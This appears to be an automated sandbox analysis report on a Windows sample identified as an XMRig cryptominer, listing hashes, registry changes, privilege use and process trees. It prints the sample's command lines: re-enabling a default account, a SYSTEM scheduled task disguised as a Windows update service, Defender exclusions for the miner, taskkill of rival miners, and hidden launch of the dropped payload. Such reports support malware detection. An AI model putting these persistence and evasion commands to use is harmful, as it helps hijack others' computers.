xmrig | 7ece8e0973bdd09081b496e90d84e88152a60bfdd98123372fc3aed1c9d49863

Analysis

max time kernel
142s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
29-03-2024 10:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
Size

5.2MB
MD5

1f1f27deffe539d99e12d720f1fbd7da
SHA1

a021497f416dded6636e88d8955a3a7632fbfcf2
SHA256

7ece8e0973bdd09081b496e90d84e88152a60bfdd98123372fc3aed1c9d49863
SHA512

2c4f8b7cf581a3ca57d7463e410a9f58bb484fef0708f15106db4c1601ebda739eef5bde96bad48e38367d53637a3deac94443d6fbf8b3d907b8838e054b1522
SSDEEP

98304:5L6uEe3WyV1kpTAuLz2LgdOnV5N2Vv9Pe11dHO2:5oe3Wy/qEuLz20ne1DHO2

Score

10^/10

xmrig miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe	xmrig
C:\Users\Administrator\Appdata\Local\Temp\Windows\Windows_Defender.exe	xmrig

Executes dropped EXE 1 IoCs

Processes:

zxmcjdm.exe

pid process

4128 zxmcjdm.exe

pid	process
4128	zxmcjdm.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows 10 Defence Agent = "\"C:\\Users\\Administrator\\Appdata\\Local\\Temp\\Windows\\StartDown.vbs\""	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Windows 10 Defence Agent = "\"C:\\Users\\Administrator\\Appdata\\Local\\Temp\\Windows\\StartDown.vbs\""	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exePowerShell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	PowerShell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log	PowerShell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 15 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3960	taskkill.exe
1884	taskkill.exe
5100	taskkill.exe
2568	taskkill.exe
2976	taskkill.exe
1964	taskkill.exe
2388	taskkill.exe
2964	taskkill.exe
3012	taskkill.exe
2580	taskkill.exe
736	taskkill.exe
1576	taskkill.exe
404	taskkill.exe
2012	taskkill.exe
3172	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exePowerShell.exeWScript.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{289AF617-1CC3-42A6-926C-E6A863F0E3BA} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000aadc3b60c081da01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	PowerShell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	PowerShell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 47 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exepowershell.exepowershell.exePowerShell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4396	powershell.exe
4396	powershell.exe
4812	powershell.exe
4812	powershell.exe
4812	powershell.exe
3012	powershell.exe
3896	powershell.exe
4924	powershell.exe
4924	powershell.exe
3896	powershell.exe
3012	powershell.exe
5076	powershell.exe
5076	powershell.exe
5076	powershell.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
1884	powershell.exe
1884	powershell.exe
1884	powershell.exe
2944	powershell.exe
2944	powershell.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
3684	PowerShell.exe
3684	PowerShell.exe
3524	powershell.exe
3524	powershell.exe
3004	powershell.exe
3004	powershell.exe
3004	powershell.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
1284	powershell.exe
1284	powershell.exe
1284	powershell.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
4400	powershell.exe
4400	powershell.exe
4400	powershell.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
1044	powershell.exe
1044	powershell.exe
1044	powershell.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4396	powershell.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeIncreaseQuotaPrivilege	3896	powershell.exe
Token: SeSecurityPrivilege	3896	powershell.exe
Token: SeTakeOwnershipPrivilege	3896	powershell.exe
Token: SeLoadDriverPrivilege	3896	powershell.exe
Token: SeSystemProfilePrivilege	3896	powershell.exe
Token: SeSystemtimePrivilege	3896	powershell.exe
Token: SeProfSingleProcessPrivilege	3896	powershell.exe
Token: SeIncBasePriorityPrivilege	3896	powershell.exe
Token: SeCreatePagefilePrivilege	3896	powershell.exe
Token: SeBackupPrivilege	3896	powershell.exe
Token: SeRestorePrivilege	3896	powershell.exe
Token: SeShutdownPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeSystemEnvironmentPrivilege	3896	powershell.exe
Token: SeRemoteShutdownPrivilege	3896	powershell.exe
Token: SeUndockPrivilege	3896	powershell.exe
Token: SeManageVolumePrivilege	3896	powershell.exe
Token: 33	3896	powershell.exe
Token: 34	3896	powershell.exe
Token: 35	3896	powershell.exe
Token: 36	3896	powershell.exe
Token: SeIncreaseQuotaPrivilege	3896	powershell.exe
Token: SeSecurityPrivilege	3896	powershell.exe
Token: SeTakeOwnershipPrivilege	3896	powershell.exe
Token: SeLoadDriverPrivilege	3896	powershell.exe
Token: SeSystemProfilePrivilege	3896	powershell.exe
Token: SeSystemtimePrivilege	3896	powershell.exe
Token: SeProfSingleProcessPrivilege	3896	powershell.exe
Token: SeIncBasePriorityPrivilege	3896	powershell.exe
Token: SeCreatePagefilePrivilege	3896	powershell.exe
Token: SeBackupPrivilege	3896	powershell.exe
Token: SeRestorePrivilege	3896	powershell.exe
Token: SeShutdownPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeSystemEnvironmentPrivilege	3896	powershell.exe
Token: SeRemoteShutdownPrivilege	3896	powershell.exe
Token: SeUndockPrivilege	3896	powershell.exe
Token: SeManageVolumePrivilege	3896	powershell.exe
Token: 33	3896	powershell.exe
Token: 34	3896	powershell.exe
Token: 35	3896	powershell.exe
Token: 36	3896	powershell.exe
Token: SeIncreaseQuotaPrivilege	3896	powershell.exe
Token: SeSecurityPrivilege	3896	powershell.exe
Token: SeTakeOwnershipPrivilege	3896	powershell.exe
Token: SeLoadDriverPrivilege	3896	powershell.exe
Token: SeSystemProfilePrivilege	3896	powershell.exe
Token: SeSystemtimePrivilege	3896	powershell.exe
Token: SeProfSingleProcessPrivilege	3896	powershell.exe
Token: SeIncBasePriorityPrivilege	3896	powershell.exe
Token: SeCreatePagefilePrivilege	3896	powershell.exe
Token: SeBackupPrivilege	3896	powershell.exe
Token: SeRestorePrivilege	3896	powershell.exe
Token: SeShutdownPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeSystemEnvironmentPrivilege	3896	powershell.exe
Token: SeRemoteShutdownPrivilege	3896	powershell.exe
Token: SeUndockPrivilege	3896	powershell.exe
Token: SeManageVolumePrivilege	3896	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exepowershell.exenet.execmd.execmd.execmd.execmd.execmd.exepowershell.exePowerShell.exeWScript.execmd.exe

description	pid	process	target process
PID 3048 wrote to memory of 3672	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	whoami.exe
PID 3048 wrote to memory of 3672	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	whoami.exe
PID 3048 wrote to memory of 4396	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 4396	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 4396 wrote to memory of 5000	4396	powershell.exe	net.exe
PID 4396 wrote to memory of 5000	4396	powershell.exe	net.exe
PID 5000 wrote to memory of 4956	5000	net.exe	net1.exe
PID 5000 wrote to memory of 4956	5000	net.exe	net1.exe
PID 3048 wrote to memory of 4812	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 4812	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 3896	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 3896	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 4924	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 4924	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 3012	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 3012	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 5076	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 5076	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 3468	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 3468	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 3444	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 3444	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 4964	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 4964	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 1548	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 1548	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 1396	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 1396	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 1884	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 1884	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3468 wrote to memory of 2976	3468	cmd.exe	taskkill.exe
PID 3468 wrote to memory of 2976	3468	cmd.exe	taskkill.exe
PID 1548 wrote to memory of 2580	1548	cmd.exe	taskkill.exe
PID 1548 wrote to memory of 2580	1548	cmd.exe	taskkill.exe
PID 4964 wrote to memory of 3172	4964	cmd.exe	taskkill.exe
PID 4964 wrote to memory of 3172	4964	cmd.exe	taskkill.exe
PID 1396 wrote to memory of 2964	1396	cmd.exe	taskkill.exe
PID 1396 wrote to memory of 2964	1396	cmd.exe	taskkill.exe
PID 3444 wrote to memory of 3960	3444	cmd.exe	taskkill.exe
PID 3444 wrote to memory of 3960	3444	cmd.exe	taskkill.exe
PID 3048 wrote to memory of 2944	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 2944	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 2944 wrote to memory of 4128	2944	powershell.exe	zxmcjdm.exe
PID 2944 wrote to memory of 4128	2944	powershell.exe	zxmcjdm.exe
PID 3684 wrote to memory of 4552	3684	PowerShell.exe	WScript.exe
PID 3684 wrote to memory of 4552	3684	PowerShell.exe	WScript.exe
PID 4552 wrote to memory of 3524	4552	WScript.exe	powershell.exe
PID 4552 wrote to memory of 3524	4552	WScript.exe	powershell.exe
PID 3048 wrote to memory of 3004	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 3004	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 3444	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 3444	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 544	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 544	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 1548	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 1548	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 4772	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 4772	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 1396	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 1396	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 1284	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 3048 wrote to memory of 1284	3048	1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe	powershell.exe
PID 1396 wrote to memory of 736	1396	cmd.exe	taskkill.exe
PID 1396 wrote to memory of 736	1396	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1f1f27deffe539d99e12d720f1fbd7da_JaffaCakes118.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3048

C:\Windows\SYSTEM32\whoami.exe
whoami /priv
2⤵
PID:3672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "net user Defaultaccount /active:yes"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4396

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" user Defaultaccount /active:yes
3⤵
- Suspicious use of WriteProcessMemory
PID:5000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Defaultaccount /active:yes
4⤵
PID:4956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "$getdate = (get-date).AddMinutes(1).ToString('HH:mm:ss');$trigger = New-ScheduledTaskTrigger -Daily -DaysInterval 1 -RandomDelay '00:00' -At $getdate; $Trigger.Repetition = $(New-ScheduledTaskTrigger -Once -RandomDelay '00:0' -At $getdate -RepetitionDuration (New-TimeSpan -Days 9000) -RepetitionInterval '00:10').Repetition;$User= 'NT AUTHORITY\SYSTEM';$Action= New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument 'C:\Users\Administrator\Appdata\Local\Temp\Windows\StartDown.vbs';Register-ScheduledTask -TaskName 'wuaserv' -Description 'Windows Update Service' -Trigger $Trigger -User $User -Action $Action -RunLevel Highest -Force -ErrorAction SilentlyContinue"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "Add-MpPreference -ExclusionPath C:\Users\Administrator\Appdata\Local\Temp\Windows"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "Set-MpPreference -ExclusionProcess zxmcjdm.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5076

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im zzmsahbg.exe /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:3468

C:\Windows\system32\taskkill.exe
taskkill /im zzmsahbg.exe /f"
3⤵
- Kills process with taskkill
PID:2976

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im xmr-stak.exe /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:3444

C:\Windows\system32\taskkill.exe
taskkill /im xmr-stak.exe /f"
3⤵
- Kills process with taskkill
PID:3960

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im asmhfn.exe /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:4964

C:\Windows\system32\taskkill.exe
taskkill /im asmhfn.exe /f"
3⤵
- Kills process with taskkill
PID:3172

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im pamguam.exe /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:1548

C:\Windows\system32\taskkill.exe
taskkill /im pamguam.exe /f"
3⤵
- Kills process with taskkill
PID:2580

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im xmrig.exe /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:1396

C:\Windows\system32\taskkill.exe
taskkill /im xmrig.exe /f"
3⤵
- Kills process with taskkill
PID:2964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'zxmcjdm'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "start-process C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe -WindowStyle hidden"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2944

C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe
"C:\Users\Administrator\Appdata\Local\Temp\Windows\zxmcjdm.exe"
3⤵
- Executes dropped EXE
PID:4128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "(Get-Process | Where-Object {$_.Name -eq 'Windows_Defender'}).count"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3004

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im zzmsahbg.exe /f"
2⤵
PID:3444

C:\Windows\system32\taskkill.exe
taskkill /im zzmsahbg.exe /f"
3⤵
- Kills process with taskkill
PID:5100

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im xmr-stak.exe /f"
2⤵
PID:544

C:\Windows\system32\taskkill.exe
taskkill /im xmr-stak.exe /f"
3⤵
- Kills process with taskkill
PID:1576

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im asmhfn.exe /f"
2⤵
PID:1548

C:\Windows\system32\taskkill.exe
taskkill /im asmhfn.exe /f"
3⤵
- Kills process with taskkill
PID:3012

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im pamguam.exe /f"
2⤵
PID:4772

C:\Windows\system32\taskkill.exe
taskkill /im pamguam.exe /f"
3⤵
- Kills process with taskkill
PID:1884

C:\Windows\SYSTEM32\cmd.exe
"cmd" "/c taskkill /im xmrig.exe /f"
